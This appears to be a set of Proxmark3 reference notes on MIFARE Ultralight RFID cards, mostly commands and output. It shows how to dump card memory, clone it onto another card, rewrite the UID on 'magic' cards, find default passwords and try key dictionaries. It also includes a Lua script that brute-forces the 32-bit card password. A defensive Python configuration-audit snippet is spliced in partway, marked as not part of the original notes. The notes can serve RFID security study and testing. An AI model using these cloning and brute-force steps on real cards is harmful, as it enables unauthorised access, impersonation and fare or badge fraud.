MIFARE Ultralight

  • Operates at 13.56 MHz
  • Uses the ISO/IEC 14443-3 protocols
  • Optional password, but it is transmitted in clear text

Documentation

MIFARE Ultralight Gen1A

  • Password Authentication

Read an Ultralight:

```
[usb] pm3 --> hf mfu info
[=] --- Tag Information --------------------------
[+] TYPE: MIFARE Ultralight (MF0ICU1)
[+] UID: 04 B7 66 DA A5 4F 80
[+] UID[0]: 04, NXP Semiconductors Germany
[+] BCC0: 5D ( ok )
[+] BCC1: B0 ( ok )
[+] Internal: 48 ( default )
[+] Lock: 00 00 - 0000000000000000
[+] OneTimePad: 00 00 00 00 - 00000000000000000000000000000000
[=] ------------------------ Fingerprint -----------------------
[=] Reading tag memory...
[=] ------------------------------------------------------------
```

Dump Memory:

```
[usb] pm3 --> hf mfu dump
[+] TYPE: MIFARE Ultralight (MF0ICU1)
[+] Reading tag memory...
[=] MFU dump file information
[=] -------------------------------------------------------------
[=] Version..... 00 00 00 00 00 00 00 00
[=] TBD 0....... 00 00
[=] TBD 1....... 00
[=] Signature... 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[=]              00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[=] Counter 0... 00 00 00
[=] Tearing 0... 00
[=] Counter 1... 00 00 00
[=] Tearing 1... 00
[=] Counter 2... 00 00 00
[=] Tearing 2... 00
[=] Max data page... 14 ( 60 bytes )
[=] Header size..... 56 bytes
[=] -------------------------------------------------------------
[=] block#   | data        |lck| ascii
[=] ---------+-------------+---+------
[=]  0/0x00  | 04 47 0E C5 |   | .G..
[=]  1/0x01  | 0A F1 33 84 |   | ..3.
[=]  2/0x02  | 4C 48 F8 01 |   | LH..
[=]  3/0x03  | F4 1B 48 15 | 1 | ..H.
[=]  4/0x04  | 54 30 35 33 | 1 | T053
[=]  5/0x05  | 37 30 32 30 | 1 | 7020
[=]  6/0x06  | 33 39 32 30 | 1 | 3920
[=]  7/0x07  | 30 31 38 32 | 1 | 0182
[=]  8/0x08  | 32 38 31 39 | 1 | 2819
[=]  9/0x09  | FF FF FF FF | 0 | ....
[=] 10/0x0A  | FF FF FF FF | 0 | ....
[=] 11/0x0B  | FF FF FF FF | 0 | ....
[=] 12/0x0C  | FF FF FF FF | 0 | ....
[=] 13/0x0D  | FF FF FF FF | 0 | ....
[=] 14/0x0E  | FF FF FF FF | 0 | ....
[=] 15/0x0F  | FF FF FF FF | 0 | ....
[=] ---------------------------------
[=] Using UID as filename
[+] saved 120 bytes to binary file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-mfu-04470E0AF13384-dump-001.bin
[+] saved to json file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-mfu-04470E0AF13384-dump-001.json
```

Clone Card:

```
[usb] pm3 --> hf mfu restore -f hf-mfu-04470E0AF13384-dump-001.bin
[+] loaded 120 bytes from binary file `hf-mfu-04470E0AF13384-dump-001.bin`
[=] Restoring hf-mfu-04470E0AF13384-dump-001.bin to card
```

Brute force Script:

```lua
local getopt = require('getopt')
local utils = require('utils')

-- Return a true value if the named file can be opened for reading
local function file_exists(name)
    local f = io.open(name, "r")
    return f ~= nil and io.close(f)
end

-- Convert a string into a hex string
local function convert_string_to_hex(str)
    return (
        str:gsub('.', function (c)
            return string.format('%02X', string.byte(c))
        end)
    )
end

-- Convert an integer into a hex string
local function convert_int_to_hex(int)
    return string.format("%x", int)
end

local function main(args)
    local start_id = 0x00000000
    local end_id = 0xFFFFFFFF

    -- Each option letter that takes a value is followed by ':'
    for option, argument in getopt.getopt(args, 's:e:') do
        -- start hex value
        if option == 's' then
            print('Start Key ' .. argument)
            start_id = tonumber(argument, 16)
        end
        -- end hex value
        if option == 'e' then
            end_id = tonumber(argument, 16)
        end
    end

    print('Starting bruteforce from key 0x' .. ('%08x'):format(start_id) .. ' to dump the data')

    for i = start_id, end_id, 1 do
        local key = ('%08x'):format(i)
        local outfile = 'decrypted_' .. key .. '.bin'
        print('Trying key ' .. key)
        core.console('hf mfu dump -k ' .. key .. ' -f ' .. outfile)
        -- The script treats the presence of the dump file as a successful key
        if file_exists(outfile) then
            print('Found key ' .. key)
            return true
        end
    end
end

main(args)
```

MIFARE Ultralight DirectWrite

MIFARE Ultralight EV1 DirectWrite

MIFARE Ultralight EV1 Magic Card

Change UID:

```
[usb] pm3 --> hf mfu setuid -u 01020304050607
[=] Please ignore possible transient BCC warnings

[usb] pm3 --> hf mfu info
[=] --- Tag Information --------------------------
[+] TYPE: MIFARE Ultralight EV1 48bytes (MF0UL1101) ( magic )
[+] UID: 01 02 03 04 05 06 07
[+] UID[0]: 01, Motorola UK
[+] BCC0: 88 ( ok )
[+] BCC1: 00 ( ok )
[+] Internal: 00 ( not default )
[+] Lock: 00 00 - 0000000000000000
[+] OneTimePad: 00 00 00 00 - 00000000000000000000000000000000
```

MIFARE Ultralight EV1

Card Info:

```
[usb] pm3 --> hf mfu info
[=] --- Tag Information --------------------------
[+] TYPE: MIFARE Ultralight EV1 48bytes (MF0UL1101)
[+] UID: 04 46 DF CA 5B 62 80
[+] UID[0]: 04, NXP Semiconductors Germany
[+] BCC0: 15 ( ok )
[+] BCC1: 73 ( ok )
[+] Internal: 48 ( default )
[+] Lock: 00 00 - 0000000000000000
[+] OneTimePad: 00 00 00 00 - 00000000000000000000000000000000
[=] --- Tag Counters
[=] [0]: 00 00 00
[+] - BD tearing ( ok )
[=] [1]: 00 00 00
[+] - BD tearing ( ok )
[=] [2]: 00 00 00
[+] - BD tearing ( ok )
[=] --- Tag Silicon Information
[=] Wafer Counter: 17582969 ( 0x10C4B79 )
[=] Wafer Coordinates: x 70, y 223 (0x46, 0xDF)
[=] Test Site: 2
[=] --- Tag Version
[=] Raw bytes: 00 04 03 01 01 00 0B 03
[=] Vendor ID: 04, NXP Semiconductors Germany
[=] Product type: Ultralight
[=] Product subtype: 01, 17 pF
[=] Major version: 01
[=] Minor version: 00
[=] Size: 0B, (64 <-> 32 bytes)
[=] Protocol type: 03, ISO14443-3 Compliant
[=] --- Tag Configuration
[=] cfg0 [16/0x10]: 00 00 00 FF
[=] - strong modulation mode disabled
[=] - pages don't need authentication
[=] cfg1 [17/0x11]: 00 05 00 00
[=] - Unlimited password attempts
[=] - NFC counter disabled
[=] - NFC counter not protected
[=] - user configuration writeable
[=] - write access is protected with password
[=] - 05, Virtual Card Type Identifier is default
[=] PWD [18/0x12]: 00 00 00 00 - (cannot be read)
[=] PACK [19/0x13]: 00 00 - (cannot be read)
[=] RFU [19/0x13]: 00 00 - (cannot be read)
[+] --- Known EV1/NTAG passwords
[+] Found default password FF FF FF FF pack 00 00
[=] ------------------------ Fingerprint -----------------------
[=] Reading tag memory...
[=] ------------------------------------------------------------
```

Read Memory:

```
[usb] pm3 --> hf mfu dump -k "FFFFFFFF"
[+] TYPE: MIFARE Ultralight EV1 48bytes (MF0UL1101)
[+] Reading tag memory...
[=] MFU dump file information
[=] -------------------------------------------------------------
[=] Version..... 00 04 03 01 01 00 0B 03
[=] TBD 0....... 00 00
[=] TBD 1....... 00
[=] Signature... 21 46 AA 5B B9 7E D9 BF E2 5B E2 9D 56 E0 AF C3
[=]              7F 43 DB 50 8B B2 3C 9E 69 70 21 EC A3 E9 56 B1
[=] Counter 0... 00 00 00
[=] Tearing 0... BD
[=] Counter 1... 00 00 00
[=] Tearing 1... BD
[=] Counter 2... 00 00 00
[=] Tearing 2... BD
[=] Max data page... 18 ( 76 bytes )
[=] Header size..... 56 bytes
[=] -------------------------------------------------------------
[=] block#   | data        |lck| ascii
[=] ---------+-------------+---+------
[=]  0/0x00  | 04 46 DF 15 |   | .F..
[=]  1/0x01  | CA 5B 62 80 |   | .[b.
[=]  2/0x02  | 73 48 00 00 |   | sH..
[=]  3/0x03  | 00 00 00 00 | 0 | ....
[=]  4/0x04  | 00 00 00 00 | 0 | ....
[=]  5/0x05  | 00 00 00 00 | 0 | ....
[=]  6/0x06  | 00 00 00 00 | 0 | ....
[=]  7/0x07  | 00 00 00 00 | 0 | ....
[=]  8/0x08  | 00 00 00 00 | 0 | ....
[=]  9/0x09  | 00 00 00 00 | 0 | ....
[=] 10/0x0A  | 00 00 00 00 | 0 | ....
[=] 11/0x0B  | 00 00 00 00 | 0 | ....
[=] 12/0x0C  | 00 00 00 00 | 0 | ....
[=] 13/0x0D  | 00 00 00 00 | 0 | ....
[=] 14/0x0E  | 00 00 00 00 | 0 | ....
[=] 15/0x0F  | 00 00 00 00 | 0 | ....
[=] 16/0x10  | 00 00 00 FF | 0 | ....
[=] 17/0x11  | 00 05 00 00 | 0 | ....
[=] 18/0x12  | FF FF FF FF | 0 | ....
[=] 19/0x13  | 00 00 00 00 | 0 | ....
[=] ---------------------------------
```
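An added example (not part of the original notes or of the Proxmark3 project) that recomputes the BCC0/BCC1 check bytes and audits the EV1 configuration pages shown in the dump above. It assumes the MF0UL11 layout the `hf mfu info` output reports (cfg0 at 0x10, cfg1 at 0x11, PWD at 0x12, last page 0x13); the function names and finding codes are this example's own.

```python
CASCADE_TAG = 0x88  # cascade tag byte, XORed into BCC0 for 7-byte UIDs

# Constructed sample: pages copied from the EV1 `hf mfu dump` output above.
PAGES = {
    0x00: "04 46 DF 15", 0x01: "CA 5B 62 80", 0x02: "73 48 00 00",
    0x10: "00 00 00 FF", 0x11: "00 05 00 00",
    0x12: "FF FF FF FF", 0x13: "00 00 00 00",
}

def parse_pages(text_pages):
    """Turn {page: 'AA BB CC DD'} into {page: bytes}."""
    return {page: bytes.fromhex(data) for page, data in text_pages.items()}

def check_uid(pages):
    """Return (uid_hex, bcc0_ok, bcc1_ok) computed from pages 0-2."""
    p0, p1, p2 = pages[0], pages[1], pages[2]
    bcc0 = CASCADE_TAG ^ p0[0] ^ p0[1] ^ p0[2]   # stored in page 0, byte 3
    bcc1 = p1[0] ^ p1[1] ^ p1[2] ^ p1[3]         # stored in page 2, byte 0
    return (p0[:3] + p1).hex().upper(), bcc0 == p0[3], bcc1 == p2[0]

def audit_config(pages, last_page=0x13):
    """Return finding codes for weak EV1 protection settings."""
    auth0 = pages[0x10][3]    # first page that requires authentication
    access = pages[0x11][0]   # PROT (bit 7), CFGLCK (bit 6), AUTHLIM (bits 2-0)
    findings = []
    if auth0 > last_page:
        findings.append("AUTH0_DISABLED")      # no page is password protected
    if not (access & 0x80):
        findings.append("READ_UNPROTECTED")    # password guards writes only
    if not (access & 0x40):
        findings.append("CONFIG_WRITABLE")     # configuration pages not locked
    if (access & 0x07) == 0:
        findings.append("UNLIMITED_ATTEMPTS")  # no limit on failed attempts
    if pages[0x12] == b"\xff\xff\xff\xff":
        findings.append("DEFAULT_PASSWORD")    # factory PWD still in place
    return findings

if __name__ == "__main__":
    pages = parse_pages(PAGES)
    print(check_uid(pages))
    for code in audit_config(pages):
        print("finding:", code)
```
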

Monotonic Counter Anti-Tearing Defeated

Anti-tearing: a feature on RFID tags that only performs a write when the card has enough power to complete it.

Source

MIFARE Ultralight AES

Read Card:

```
[usb] pm3 --> hf mfu info
[=] --- Tag Information --------------------------
[+] TYPE: MIFARE Ultralight AES
[+] UID: 04 D1 45 EA 6F 1F 90
[+] UID[0]: 04, NXP Semiconductors Germany
[+] BCC0: 18 ( ok )
[+] BCC1: 0A ( ok )
[+] Internal: 48 ( default )
[+] Lock: 0F 00 - 0000111100000000
[+] OTP: 9D 55 EC 1A - 10011101010101011110110000011010
[=] --- Tag Silicon Information
[=] Wafer Counter: 19131901 ( 0x123EDFD )
[=] Wafer Coordinates: x 209, y 69 (0xD1, 0x45)
[=] Test Site: 2
[=] --- Tag Counters
[=] IC signature public key name: NXP Ultralight AES (alt key)
[=] IC signature public key value: 04DC34DAA903F2726A6225B11C692AF6
[=]                              : AB4396575CA12810CBBCE3F781A097B3
[=]                              : 833B50AB364A70D9C2B641A728A599AE
[=]                              : 74
[=] Elliptic curve parameters: secp192r1
[=] TAG IC Signature: C853ACB7D96E636E60AD0A3A3940B2DD
[=]                 : 90AD6ADC4CDDE84BC969BECD0C091A11
[=]                 : 174A8FA3AFF02258EA21FF9C436CDB15
[+] Signature verification: successful
[=] --- Tag Version
[=] Raw bytes: 0004030104000F03
[=] Vendor ID: 04, NXP Semiconductors Germany
[=] Product type: Ultralight
[=] Product subtype: 01, 17 pF
[=] Major version: 04
[=] Minor version: 00
[=] Size: 0F, (256 - 128 bytes)
[=] Protocol type: 03, ISO14443-3 Compliant
[!] ⚠️ Warning: block 0x29 cannot be read
[+] --- Known UL-AES keys
[=] n/a
[=]
[=] --- Fingerprint
[=] n/a
[=] Tag appears to be locked, try using a key to get more info
[?] Hint: Try `hf mfu pwdgen -r` to get see known pwd gen algo suggestions
```

Try Keys:

```
[usb] pm3 --> hf mfu aeschk -f /home/generalzero/Downloads/proxmark3/client/dictionaries/mfulc_default_keys.dic
[+] Loaded 7 keys from dictionary file `/home/generalzero/Downloads/proxmark3/client/dictionaries/mfulc_default_keys.dic`
🕒 Testing 0/ 7 ( 0.0 % )
[=] Time spent 0.1s
[=] Authentication attempts: 7
[=] Speed: 66.0 auths/s
```

MIFARE Ultralight Magic

Write Blocks:

```
[usb] pm3 --> hf mfu setuid --uid 01020304050607
[=] Please ignore possible transient BCC warnings

[usb] pm3 --> hf mfu info
[=] --- Tag Information --------------------------
[+] TYPE: Unknown 000000
[+] UID: 01 02 03 04 05 06 07
[+] UID[0]: 01, Motorola UK
[+] BCC0: 88 ( ok )
[+] BCC1: 00 ( ok )
[+] Internal: 00 ( not default )
[+] Lock: 00 00 - 0000000000000000
[+] OneTimePad: 00 00 00 00 - 00000000000000000000000000000000
[=] ------------------------ Fingerprint -----------------------
[=] Reading tag memory...
[=] ------------------------------------------------------------
```